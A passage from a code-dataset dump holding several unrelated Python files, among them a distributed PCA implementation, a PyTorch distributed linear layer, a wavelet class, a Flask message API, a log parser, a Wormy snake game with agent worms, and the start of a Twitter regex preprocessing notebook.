COLLECTION_INOUT\nfrom pycompss.api.task import task\nfrom sklearn.base import BaseEstimator\nfrom sklearn.utils import validation\n\nfrom dislib.data.array import Array\n\n\nclass PCA(BaseEstimator):\n \"\"\" Principal component analysis (PCA) using the covariance method.\n\n Performs a full eigendecomposition of the covariance matrix.\n\n Parameters\n ----------\n n_components : int or None, optional (default=None)\n Number of components to keep. If None, all components are kept.\n arity : int, optional (default=50)\n Arity of the reductions.\n\n Attributes\n ----------\n components_ : array, shape (n_components, n_features)\n Principal axes in feature space, representing the directions of maximum\n variance in the data. The components are sorted by explained_variance_.\n\n Equal to the n_components eigenvectors of the covariance matrix with\n greater eigenvalues.\n explained_variance_ : array, shape (n_components,)\n The amount of variance explained by each of the selected components.\n\n Equal to the first n_components largest eigenvalues of the covariance\n matrix.\n mean_ : array, shape (n_features,)\n Per-feature empirical mean, estimated from the training set.\n\n Examples\n --------\n >>> from dislib.decomposition import PCA\n >>> import numpy as np\n >>> import dislib as ds\n >>> x = np.array([[1, 2], [1, 4], [1, 0], [4, 2], [4, 4], [4, 0]])\n >>> bn, bm = 2, 2\n >>> data = ds.array(x=x, block_size=(bn, bm))\n >>> pca = PCA()\n >>> transformed_data = pca.fit_transform(data)\n >>> print(transformed_data)\n >>> print(pca.components_)\n >>> print(pca.explained_variance_)\n \"\"\"\n\n def __init__(self, n_components=None, arity=50):\n self.n_components = n_components\n self.arity = arity\n\n @property\n def components_(self):\n validation.check_is_fitted(self, '_components')\n self._components = compss_wait_on(self._components)\n return self._components\n\n @property\n def explained_variance_(self):\n validation.check_is_fitted(self, '_variance')\n self._variance = compss_wait_on(self._variance)\n return self._variance\n\n def fit(self, x):\n \"\"\" Fit the model with the dataset.\n\n Parameters\n ----------\n x : ds-array, shape (n_samples, n_features)\n Training data.\n\n Returns\n -------\n self : PCA\n \"\"\"\n\n n_samples = x.shape[0]\n self.mean_ = _features_mean(x, self.arity, n_samples)\n norm_blocks = []\n for rows in x._iterator('rows'):\n aux_rows = [object() for _ in range(x._n_blocks[1])]\n _normalize(rows._blocks, aux_rows, self.mean_)\n norm_blocks.append(aux_rows)\n\n # we shallow copy the original to create a normalized darray\n norm_x = copy(x)\n # shallow copy is enough to avoid modifying original darray x when\n # changing the blocks\n norm_x._blocks = norm_blocks\n\n scatter_matrix = _scatter_matrix(norm_x, self.arity)\n covariance_matrix = _estimate_covariance(scatter_matrix, n_samples)\n eig_val, eig_vec = _decompose(covariance_matrix, self.n_components)\n\n self._components = eig_vec\n self._variance = eig_val\n\n return self\n\n def fit_transform(self, x):\n \"\"\" Fit the model with the dataset and apply the dimensionality\n reduction to it.\n\n Parameters\n ----------\n x : ds-array, shape (n_samples, n_features)\n Training data.\n\n Returns\n -------\n transformed_darray : ds-array, shape (n_samples, n_components)\n \"\"\"\n return self.fit(x).transform(x)\n\n def transform(self, x):\n \"\"\"\n Apply dimensionality reduction to ds-array.\n\n The given dataset is projected on the first principal components\n previously extracted from a training ds-array.\n\n Parameters\n ----------\n x : ds-array, shape (n_samples, n_features)\n New ds-array, with the same n_features as the training dataset.\n\n Returns\n -------\n transformed_darray : ds-array, shape (n_samples, n_components)\n \"\"\"\n return _transform(x, self.mean_, self.components_)\n\n\ndef _features_mean(x, arity, n_samples):\n partials = []\n for rows in x._iterator('rows'):\n partials.append(_subset_feature_sum(rows._blocks))\n return _reduce_features_mean(partials, arity, n_samples)\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2}, returns=1)\ndef _subset_feature_sum(blocks):\n block = Array._merge_blocks(blocks)\n return block.sum(axis=0)\n\n\ndef _reduce_features_mean(partials, arity, n_samples):\n while len(partials) > 1:\n partials_chunk = partials[:arity]\n partials = partials[arity:]\n partials.append(_merge_features_sum(*partials_chunk))\n return _finalize_features_mean(partials[0], n_samples)\n\n\n@task(returns=1)\ndef _merge_features_sum(*partials):\n return sum(partials)\n\n\n@task(returns=1)\ndef _finalize_features_mean(feature_sums, n_samples):\n return feature_sums / n_samples\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2},\n out_blocks={Type: COLLECTION_INOUT, Depth: 1})\ndef _normalize(blocks, out_blocks, means):\n data = Array._merge_blocks(blocks)\n data = np.array(data - means)\n\n bn, bm = blocks[0][0].shape\n\n for j in range(len(blocks[0])):\n out_blocks[j] = data[:, j * bm:(j + 1) * bm]\n\n\ndef _scatter_matrix(x, arity):\n partials = []\n for rows in x._iterator('rows'):\n partials.append(_subset_scatter_matrix(rows._blocks))\n return _reduce_scatter_matrix(partials, arity)\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2}, returns=1)\ndef _subset_scatter_matrix(blocks):\n data = Array._merge_blocks(blocks)\n return np.dot(data.T, data)\n\n\ndef _reduce_scatter_matrix(partials, arity):\n while len(partials) > 1:\n partials_chunk = partials[:arity]\n partials = partials[arity:]\n partials.append(_merge_partial_scatter_matrix(*partials_chunk))\n return partials[0]\n\n\n@task(returns=1)\ndef _merge_partial_scatter_matrix(*partials):\n return sum(partials)\n\n\n@task(returns=1)\ndef _estimate_covariance(scatter_matrix, n_samples):\n return scatter_matrix / (n_samples - 1)\n\n\n@task(returns=2)\ndef _decompose(covariance_matrix, n_components):\n eig_val, eig_vec = np.linalg.eigh(covariance_matrix)\n\n if n_components is None:\n n_components = len(eig_val)\n\n # first n_components eigenvalues in descending order:\n eig_val = eig_val[::-1][:n_components]\n\n # first n_components eigenvectors in rows, with the corresponding order:\n eig_vec = eig_vec.T[::-1][:n_components]\n\n # normalize eigenvectors sign to ensure deterministic output\n max_abs_cols = np.argmax(np.abs(eig_vec), axis=1)\n signs = np.sign(eig_vec[range(len(eig_vec)), max_abs_cols])\n eig_vec *= signs[:, np.newaxis]\n\n return eig_val, eig_vec\n\n\ndef _transform(x, mean, components):\n new_blocks = []\n for rows in x._iterator('rows'):\n out_blocks = [object() for _ in range(rows._n_blocks[1])]\n _subset_transform(rows._blocks, out_blocks, mean, components)\n new_blocks.append(out_blocks)\n\n return Array(blocks=new_blocks, top_left_shape=x._top_left_shape,\n reg_shape=x._reg_shape,\n shape=(x.shape[0], components.shape[1]), sparse=x._sparse)\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2},\n out_blocks={Type: COLLECTION_INOUT, Depth: 1})\ndef _subset_transform(blocks, out_blocks, mean, components):\n data = Array._merge_blocks(blocks)\n bn, bm = blocks[0][0].shape\n\n res = (np.matmul(data - mean, components.T))\n\n for j in range(0, len(blocks[0])):\n out_blocks[j] = res[:, j * bm:(j + 1) * bm]\n","sub_path":"dislib/decomposition/pca/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"111854533","text":"import torch\n\nfrom distdl.nn.broadcast import Broadcast\nfrom distdl.nn.module import Module\nfrom distdl.nn.sum_reduce import SumReduce\nfrom distdl.utilities.slicing import compute_subshape\n\n\nclass DistributedLinear(Module):\n\n def __init__(self, P_x, P_y, P_w, in_features, out_features, bias=True):\n\n super(DistributedLinear, self).__init__()\n\n # P_x ~ 1 X P_fi\n self.P_x = P_x\n # P_y ~ 1 X P_fo\n self.P_y = P_y\n # P_w ~ P_fo X P_fi\n self.P_w = P_w\n\n self.bias = bias\n\n self.x_broadcast = Broadcast(self.P_x, self.P_w, preserve_batch=True)\n\n if self.P_w.active:\n local_in_features = compute_subshape(P_w.shape[1], P_w.index[1], in_features)\n local_out_features = compute_subshape(P_w.shape[0], P_w.index[0], out_features)\n # On column 0, use the specified bias, otherwise no bias to\n # prevent double counting\n bias = self.bias if (self.P_w.index[-1] == 0) else False\n self.sublinear = torch.nn.Linear(local_in_features[0], local_out_features[0], bias=bias)\n\n self.y_sum_reduce = SumReduce(self.P_w, self.P_y,\n transpose_src=True, preserve_batch=True)\n\n def forward(self, input):\n\n if not (self.P_x.active or self.P_y.active or self.P_w.active):\n return input.clone()\n\n # broadcast x down the columns\n x = self.x_broadcast(input)\n\n # apply the linear layer\n if self.P_w.active:\n x = self.sublinear(x)\n\n # reduce y across the rows\n y = self.y_sum_reduce(x)\n\n return y\n","sub_path":"src/distdl/nn/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"503409353","text":"#!/usr/bin/env python3.6\n\n# -*- coding: utf-8 -*-\n\n# Imports\nimport logging\nimport argparse\nimport util.config\nimport npyscreen\nimport os\nimport locale\nfrom util.forms.splash import SplashFormClass\n\n# Globals and other helper functions\n\n\nclass HDPTuiApp(npyscreen.NPSAppManaged):\n def onStart(self):\n self.registerForm(\"MAIN\", SplashFormClass())\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"HDP Text User Interface.\",\n epilog=\"Made by César (Idaho06) Rodríguez Moreno.\")\n # parser.add_argument(\"echo\", help=\"echo the string you use here\")\n # parser.add_argument(\"-db\", \"--database\", help=\"Database to be used.\", default=\"/tmp/termgame.sqlite3\")\n parser.add_argument(\"-d\", \"--debug\", help=\"Debug level: DEBUG, INFO, WARNING, ERROR or CRITICAL\", default=\"WARNING\")\n parser.add_argument(\"-o\", \"--erroroutput\", help=\"File of error output. Default is stderr.\", default=\"stderr\")\n parser.add_argument(\"-c\", \"--config\", help=\"Sets configuration file. Default is hdptui.ini\", default=\"hdptui.ini\")\n args = parser.parse_args()\n\n loglevel = logging.WARNING\n logoutput = None\n if args.debug == \"DEBUG\":\n loglevel = logging.DEBUG\n if args.debug == \"INFO\":\n loglevel = logging.INFO\n if args.debug == \"ERROR\":\n loglevel = logging.ERROR\n if args.debug == \"CRITICAL\":\n loglevel = logging.CRITICAL\n if args.erroroutput != \"stderr\":\n logoutput = args.erroroutput\n logging.basicConfig(level=loglevel, filename=logoutput,\n format=\"%(asctime)s %(levelname)s: %(funcName)s: %(message)s\")\n logging.info(\"Logging level set to %s.\" % logging.getLevelName(loglevel))\n\n config = util.config.ConfigClass(args.config)\n\n if os.environ.get('LC_ALL') is None:\n os.environ['LC_ALL'] = \"en_US.UTF-8\"\n\n TA = HDPTuiApp()\n\n exit(TA.run())\n","sub_path":"hdptui.py","file_name":"hdptui.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"500605826","text":"import numpy as np \nimport scipy.interpolate \nimport matplotlib.pyplot as plt \nfrom helper_functions import spline_support \nimport scipy.integrate \n\n\n\nclass Wavelet:\n\n def __init__(self, j, d, mask):\n self.d = d\n self.j = j + 1 \n self.knot_sequence = [0 for ii in range(d)] + [2**-self.j * ii for ii in range(1,2**self.j)] + [1 for ii in range(d)]\n self.basis_dimension = 2**self.j + d -1\n self.function = scipy.interpolate.BSpline(self.knot_sequence, mask, d-1, extrapolate = False) \n self.evaluate_support(mask) \n\n def evaluate_support(self, mask):\n\n indices = np.where(abs(mask) > 1e-5)[0]\n l_1 = 1\n l_2 = 0\n for k in indices:\n new_l1, new_l2 = spline_support(k, self.j, self.d)\n if new_l1 < l_1:\n l_1 = new_l1\n if new_l2 > l_2:\n l_2 = new_l2 \n\n self.l_1 = l_1\n self.l_2 = l_2\n\n def inner_product(self, f):\n\n return scipy.integrate.quad(lambda x:f(x)*self.eval(x) , self.l_1, self.l_2)[0]\n\n\n\n def eval(self, x):\n return 2**(self.j/2.) * self.function(x) \n\n def plot(self, show = True, derivative = False):\n x = np.linspace(0,1,1000)\n plt.plot(x, self.eval(x))\n\n if derivative:\n plt.plot(x, self.derivative(x))\n if show: \n plt.show() \n\n\n def derivative(self, x):\n derivative = self.function.derivative()\n return 2**(self.j/2.)*derivative(x)\n\n\n\n\n\nif __name__ == \"__main__\":\n \n coeff = np.zeros((66,1))\n coeff[1] = 1.0\n coeff[2] = 1.0\n wavelet = Wavelet(5, 3, coeff)\n \n wavelet.plot()","sub_path":"src/wavelet.py","file_name":"wavelet.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"170633051","text":"import os\r\nimport flask\r\nfrom flask import Flask, request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nimport uuid\r\nfrom model import BdConnection, db, setMessage, getMessage\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('dbdir')\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\nwith app.app_context():\r\n\tdb = SQLAlchemy(app)\r\n\tBdConnection(db)\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return \"

Chatbot conversation

\"\r\n\r\n@app.route('/sendMessage', methods=['GET'])\r\ndef sendMessage():\r\n message = request.args.get('message')\r\n idTrabajo = str(uuid.uuid4())\r\n messageBd = getMessage()\r\n return messageBd\r\n\r\n@app.route('/dumpMessage', methods=['POST'])\r\ndef dumpMessage():\r\n jrequest = request.get_json()\r\n message = jrequest.get('message')\r\n idTrabajo = str(uuid.uuid4())\r\n setMessage(idTrabajo, message)\r\n return \"Mensaje insertado en la BBDD\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295649444","text":"# Wormy (a Nibbles clone)\n# By Al Sweigart al@inventwithpython.com\n# http://inventwithpython.com/pygame\n# Released under a \"Simplified BSD\" license\n\nimport random, pygame, sys\nfrom pygame.locals import *\n\nFPS = 30\nWINDOWWIDTH = 800\nWINDOWHEIGHT = 640\nCELLSIZE = 10\nassert WINDOWWIDTH % CELLSIZE == 0, \"Window width must be a multiple of cell size.\"\nassert WINDOWHEIGHT % CELLSIZE == 0, \"Window height must be a multiple of cell size.\"\nCELLWIDTH = int(WINDOWWIDTH / CELLSIZE)\nCELLHEIGHT = int(WINDOWHEIGHT / CELLSIZE)\n\nSEEKLENGTH = 10 #The radius from an Apple until a worm \"knows\" about it.\nUSEAGENTS = True #Use Agents instead of central control\nQUADRANT = False #Generate apples only in one quadrant\n\n# R G B\nWHITE = (255, 255, 255)\nBLACK = ( 0, 0, 0)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nDARKGREEN = ( 0, 155, 0)\nDARKGRAY = ( 40, 40, 40)\nBGCOLOR = BLACK\n\nUP = 'up'\nDOWN = 'down'\nLEFT = 'left'\nRIGHT = 'right'\n\nAPPLES = []\nWORMS = []\n\nSCORE = 0\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def distance(self, point):\n return abs(self.x - point.x) + abs(self.y - point.y)\n\nclass Apple(Point):\n def __init__(self, x, y, life):\n self.x = x\n self.y = y\n self.life = life\n\n def tick(self):\n self.life -= 1\n if self.life == 0:\n global SCORE\n SCORE -= 1\n APPLES.remove(self)\n \nclass Worm:\n def __init__(self, x, y, agent):\n self.wormCoords = [Point(x,y),\n Point(x - 1, y),\n Point(x - 2, y)]\n self.direction = RIGHT\n self.agent = agent\n self.death = False\n\n @property\n def head(self):\n return self.wormCoords[0]\n\n #Grow the worm\n def appendHead(self, value):\n self.wormCoords.insert(0, value)\n\n #Move away from a point\n def moveAwayFromPoint(self, point):\n self.direction = UP\n currentDistance = point.distance(Point(self.head.x, self.head.y - 1))\n\n distance = point.distance(Point(self.head.x, self.head.y + 1))\n if (distance > currentDistance):\n self.direction = DOWN\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x - 1, self.head.y))\n if (distance > currentDistance):\n self.direction = LEFT\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x + 1, self.head.y))\n if (distance > currentDistance):\n self.direction = RIGHT\n\n #Move towards a point \n def moveTowardsPoint(self, point):\n self.direction = UP\n currentDistance = point.distance(Point(self.head.x, self.head.y - 1))\n\n distance = point.distance(Point(self.head.x, self.head.y + 1))\n if (distance < currentDistance):\n self.direction = DOWN\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x - 1, self.head.y))\n if (distance < currentDistance):\n self.direction = LEFT\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x + 1, self.head.y))\n if (distance < currentDistance):\n self.direction = RIGHT\n\n #Move left or right randomly\n def moveToTheSide(self):\n if random.randint(0,1) == 0:\n self.moveCounterClockwise()\n else:\n self.moveClockwise()\n\n #Move randomly\n def moveRandomDirection(self):\n newDirection = random.randint(0,15)\n if newDirection == 0 and self.direction != UP:\n self.direction = UP\n elif newDirection == 1 and self.direction != DOWN:\n self.direction = DOWN\n elif newDirection == 2 and self.direction != LEFT:\n self.direction = LEFT\n elif newDirection == 3 and self.direction != RIGHT:\n self.direction = RIGHT\n\n #Move left\n def moveCounterClockwise(self):\n if self.direction == UP:\n self.direction = LEFT\n elif self.direction == LEFT:\n self.direction = DOWN\n elif self.direction == DOWN:\n self.direction = RIGHT\n elif self.direction == RIGHT:\n self.direction = UP\n\n #Move right \n def moveClockwise(self):\n if self.direction == UP:\n self.direction = RIGHT\n elif self.direction == RIGHT:\n self.direction = DOWN\n elif self.direction == DOWN:\n self.direction = LEFT\n elif self.direction == LEFT:\n self.direction = UP\n\n #Turn around\n def moveOpposite(self):\n if self.direction == UP:\n self.direction = DOWN\n elif self.direction == RIGHT:\n self.direction = LEFT\n elif self.direction == DOWN:\n self.direction = UP\n elif self.direction == LEFT:\n self.direction = RIGHT\n\n #Kill the worm \n def kill(self):\n self.death = True\n self.wormCoords = []\n WORMS.remove(self)\n\n #Get apples the worm knows about\n @property\n def closeApples(self):\n return sorted(filter((lambda x: x.distance(self.head) < SEEKLENGTH), APPLES), key=lambda x: x.distance(self.head))\n\n #Get worms the worm knows about\n @property\n def closeWorms(self):\n return sorted(filter((lambda x: x.head.distance(self.head) < SEEKLENGTH), WORMS), key=lambda x: x.head.distance(self.head))\n\n #Tick\n def tick(self):\n if self.death:\n return\n\n #Eat any apples and split the worm in two if length is greater than 6.\n for apple in APPLES:\n if self.head.x == apple.x and self.head.y == apple.y:\n # don't remove worm's tail segment\n APPLES.remove(apple)\n self.wormCoords.append(self.wormCoords[-1])\n global SCORE\n SCORE += 1\n if len(self.wormCoords) >= 6:\n WORMS.remove(self)\n worm1 = Worm(self.head.x, self.head.y, self.agent)\n worm2 = Worm(self.wormCoords[-1].x, self.wormCoords[-1].y, self.agent)\n worm1.direction = self.direction\n worm2.direction = self.direction\n worm2.moveOpposite()\n WORMS.append(worm1)\n WORMS.append(worm2)\n \n return\n\n\n #Are we an agent? If so move the worm according to two simple rules.\n if self.agent:\n #If any apples are close, move towards the closest. Otherwise, move randomly.\n if len(self.closeApples) != 0:\n self.moveTowardsPoint(self.closeApples[0])\n else:\n self.moveRandomDirection()\n\n #Move the worm in the current direction. If direction is invalid, turn until a valid direction is found.\n validMove = False\n while validMove == False:\n \n validMove = True\n \n #Move the the worm by adding a segment in the direction it is moving\n if self.direction == UP:\n newHead = Point(self.head.x, self.head.y - 1)\n elif self.direction == DOWN:\n newHead = Point(self.head.x, self.head.y + 1)\n elif self.direction == LEFT:\n newHead = Point(self.head.x - 1, self.head.y)\n elif self.direction == RIGHT:\n newHead = Point(self.head.x + 1, self.head.y)\n self.appendHead(newHead)\n \n # check if the worm has his the edge\n if self.head.x == -1 or self.head.x == CELLWIDTH or self.head.y == -1 or self.head.y == CELLHEIGHT:\n self.wormCoords.pop(0)\n validMove = False\n \n #check if the worm has hit itself\n for wormBody in self.wormCoords[1:]:\n if wormBody.x == self.head.x and wormBody.y == self.head.y:\n self.wormCoords.pop(0)\n validMove = False\n \n \n if validMove == False:\n self.moveToTheSide()\n \n\n #check if the worm has hit another worm.\n for worm in WORMS:\n for wormBody in worm.wormCoords:\n if worm != self and self.head.x == wormBody.x and self.head.y == wormBody.y:\n #Kill the longest worm\n if len(worm.wormCoords) > len(self.wormCoords):\n worm.kill()\n else:\n self.kill()\n return\n \n del self.wormCoords[-1] # remove worm's tail segment\n\n\ndef main():\n global FPSCLOCK, DISPLAYSURF, BASICFONT\n random.seed(8018593223) #seed with number\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n BASICFONT = pygame.font.Font('freesansbold.ttf', 18)\n pygame.display.set_caption('Wormy')\n\n showStartScreen()\n while True:\n runGame()\n showGameOverScreen()\n\n\ndef runGame():\n\n ticks = 0\n \n # Start the apples in a random place.\n for i in range(0, 100):\n point = getRandomLocation()\n if QUADRANT:\n point = getRandomLocationInQuadrant()\n apple = Apple(point.x, point.y, random.randint(100,300))\n APPLES.append(apple)\n \n WORMS.append(Worm(random.randint(5, CELLWIDTH - 6), random.randint(5, CELLHEIGHT - 6), USEAGENTS))\n WORMS.append(Worm(random.randint(5, CELLWIDTH - 6), random.randint(5, CELLHEIGHT - 6), USEAGENTS))\n \n while True: # main game loop\n for event in pygame.event.get(): # event handling loop\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n\n if USEAGENTS == False:\n centralControl()\n \n for worm in WORMS:\n worm.tick()\n if len(APPLES) == 0:\n return\n \n for apple in APPLES:\n apple.tick()\n \n DISPLAYSURF.fill(BGCOLOR)\n drawGrid()\n for worm in WORMS:\n drawWorm(worm.wormCoords)\n \n for apple in APPLES: \n drawApple(apple)\n drawScore(SCORE, (50, 10))\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n ticks += 1\n\ndef centralControl():\n #This method is the main central control logic.\n \n #Get a list of all known apples by all worms in the system.\n apples = set()\n for worm in WORMS:\n apples.update(worm.closeApples)\n\n #Assign a worm to go to each Apple\n for worm in WORMS:\n demApples = list(apples)\n if len(apples) > 0:\n assigned = False\n #Find the closest Apple and head there\n while assigned == False and len(demApples) > 0:\n assigned = True\n closestApple = reduce(lambda x,y: x if x.distance(worm.head) < y.distance(worm.head) else y, demApples)\n worm.moveTowardsPoint(closestApple)\n \n #If we aren't the closest worm to our closest Apple then find the next closest Apple\n closestWorm = reduce(lambda x,y: x if x.head.distance(closestApple) < y.head.distance(closestApple) else y, WORMS)\n if worm != closestWorm:\n worm.moveRandomDirection()\n demApples.remove(closestApple)\n assigned = False\n else:\n worm.moveRandomDirection()\n \n \n\ndef drawPressKeyMsg():\n pressKeySurf = BASICFONT.render('Press a key to play.', True, DARKGRAY)\n pressKeyRect = pressKeySurf.get_rect()\n pressKeyRect.topleft = (WINDOWWIDTH - 200, WINDOWHEIGHT - 30)\n DISPLAYSURF.blit(pressKeySurf, pressKeyRect)\n\n\ndef checkForKeyPress():\n if len(pygame.event.get(QUIT)) > 0:\n terminate()\n\n keyUpEvents = pygame.event.get(KEYUP)\n if len(keyUpEvents) == 0:\n return None\n if keyUpEvents[0].key == K_ESCAPE:\n terminate()\n return keyUpEvents[0].key\n\n\ndef showStartScreen():\n titleFont = pygame.font.Font('freesansbold.ttf', 100)\n titleSurf1 = titleFont.render('Wormy!', True, WHITE, DARKGREEN)\n titleSurf2 = titleFont.render('Wormy!', True, GREEN)\n\n degrees1 = 0\n degrees2 = 0\n while True:\n DISPLAYSURF.fill(BGCOLOR)\n rotatedSurf1 = pygame.transform.rotate(titleSurf1, degrees1)\n rotatedRect1 = rotatedSurf1.get_rect()\n rotatedRect1.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)\n DISPLAYSURF.blit(rotatedSurf1, rotatedRect1)\n\n rotatedSurf2 = pygame.transform.rotate(titleSurf2, degrees2)\n rotatedRect2 = rotatedSurf2.get_rect()\n rotatedRect2.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)\n DISPLAYSURF.blit(rotatedSurf2, rotatedRect2)\n\n drawPressKeyMsg()\n\n if checkForKeyPress():\n pygame.event.get() # clear event queue\n return\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n degrees1 += 3 # rotate by 3 degrees each frame\n degrees2 += 7 # rotate by 7 degrees each frame\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\ndef getRandomLocation():\n return Point(random.randint(0, CELLWIDTH - 1), random.randint(0, CELLHEIGHT - 1))\n\ndef getRandomLocationInQuadrant():\n return Point(random.randint(0, CELLWIDTH/2 - 1), random.randint(0, CELLHEIGHT/2 - 1))\n\n\ndef showGameOverScreen():\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\n gameSurf = gameOverFont.render('Game', True, WHITE)\n overSurf = gameOverFont.render('Over', True, WHITE)\n gameRect = gameSurf.get_rect()\n overRect = overSurf.get_rect()\n gameRect.midtop = (WINDOWWIDTH / 2, 10)\n overRect.midtop = (WINDOWWIDTH / 2, gameRect.height + 10 + 25)\n\n DISPLAYSURF.blit(gameSurf, gameRect)\n DISPLAYSURF.blit(overSurf, overRect)\n drawPressKeyMsg()\n pygame.display.update()\n pygame.time.wait(500)\n checkForKeyPress() # clear out any key presses in the event queue\n\n while True:\n if checkForKeyPress():\n pygame.event.get() # clear event queue\n return\n\ndef drawScore(score, loc):\n scoreSurf = BASICFONT.render('Score: %s' % (score), True, WHITE)\n scoreRect = scoreSurf.get_rect()\n scoreRect.topleft = loc #(WINDOWWIDTH - 120, 10)\n DISPLAYSURF.blit(scoreSurf, scoreRect)\n\n\ndef drawWorm(wormCoords):\n for coord in wormCoords:\n x = coord.x * CELLSIZE\n y = coord.y * CELLSIZE\n wormSegmentRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\n pygame.draw.rect(DISPLAYSURF, DARKGREEN, wormSegmentRect)\n wormInnerSegmentRect = pygame.Rect(x + 4, y + 4, CELLSIZE - 8, CELLSIZE - 8)\n pygame.draw.rect(DISPLAYSURF, GREEN, wormInnerSegmentRect)\n\n\ndef drawApple(apple):\n x = apple.x * CELLSIZE\n y = apple.y * CELLSIZE\n appleRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\n pygame.draw.rect(DISPLAYSURF, RED, appleRect)\n\n\ndef drawGrid():\n for x in range(0, WINDOWWIDTH, CELLSIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))\n for y in range(0, WINDOWHEIGHT, CELLSIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWWIDTH, y))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2015 Fall/CS6100 - Agents/Homework2/wormy.py","file_name":"wormy.py","file_ext":"py","file_size_in_byte":15587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"219291739","text":"import argparse\nfrom funcs import date_, read_line, open_files, close_files\n\ndef argments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--year_start\", type=int, default=0)\n parser.add_argument(\"--year_end\", type=int, default=10000)\n parser.add_argument(\"--month_start\", type=int, default=1)\n parser.add_argument(\"--month_end\", type=int, default=12)\n parser.add_argument(\"--day_start\", type=int, default=1)\n parser.add_argument(\"--day_end\", type=int, default=31)\n parser.add_argument(\"--hour_start\", type=int, default=0)\n parser.add_argument(\"--hour_end\", type=int, default=24)\n args = parser.parse_args()\n kwargs = {\n \"year_start\": args.year_start,\n \"year_end\": args.year_end,\n \"month_start\": args.month_start,\n \"month_end\": args.month_end,\n \"day_start\": args.day_start,\n \"day_end\": args.day_end,\n \"hour_start\": args.hour_start,\n \"hour_end\": args.hour_end\n }\n return kwargs\nkwargs = argments()\n\ndef processing(files):\n file_log = {}\n date_log = {}\n date = ''\n for file in files:\n log = read_line(file, kwargs)\n if log is None:\n file.close()\n files.remove(file)\n continue\n file_log[file] = log\n while file_log:\n file, log = sorted(file_log.items(), key=lambda x:date_(x[1][3]))[0]\n if log[3] == date:\n if log[0] in date_log.keys():\n date_log[log[0]] += 1\n else:\n date_log[log[0]] = 1\n else:\n print_date_log(date_log)\n date = log[3]\n print(date)\n date_log = {log[0]: 1}\n log = read_line(file, kwargs)\n if log is None:\n file.close()\n files.remove(file)\n del file_log[file]\n else:\n file_log[file] = log\n print_date_log(date_log)\n\ndef print_date_log(date_log):\n for host, num in sorted(date_log.items(), key=lambda x:x[1], reverse=True):\n print(\"ip:\", host, \"\\t num:\", num)\n\n\nif __name__ == \"__main__\":\n with open(\"log_file_paths.txt\", 'r') as f:\n file_paths = f.read().splitlines()\n files = open_files(file_paths)\n processing(files)\n close_files(files)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"381770307","text":"\n# coding: utf-8\n\n# ## Twitter Regular Expressions\n# Regular expressions for pre-processing pro-ana tweets. Includes:\n# \n# - surrounding LIWC-aware punctuation with spaces\n# - (except for url's and twitter entities)\n# - regexes for assorted smileys into 4 tokens: ): (: (; :/\n# - case munging: lower case unless all caps\n# \n# The format is a list of `('search expression','replacement expression')` tuples.\n\n# In[2]:\n\nfrom __future__ import unicode_literals\n\ntry:\n re\nexcept NameError:\n import regex as re\n print (\"imported regex as re\")\n\ntry:\n from ttp import ttp\nexcept ImportError:\n ttp = None\n print(\"Couldn't load twitter-text! Tweet entities may not be recognised! Try `pip install twitter-text-python`\")\n\ntry:\n # Python 2.6-2.7 \n from HTMLParser import HTMLParser\n unescape = HTMLParser().unescape\nexcept ImportError:\n # Python 3.5\n from html import unescape\n\nfrom itertools import chain # is this the same in python 2?\nfrom operator import itemgetter\n\n\n# In[2]:\n\npunctuationRe = r\"\"\" (['`\\[\\](){}⟨⟩:,\\-‒–—―!.?‘’“”\"•;…/\\|=+_~@#^&*<>]) \"\"\"\n\nregexStyles = 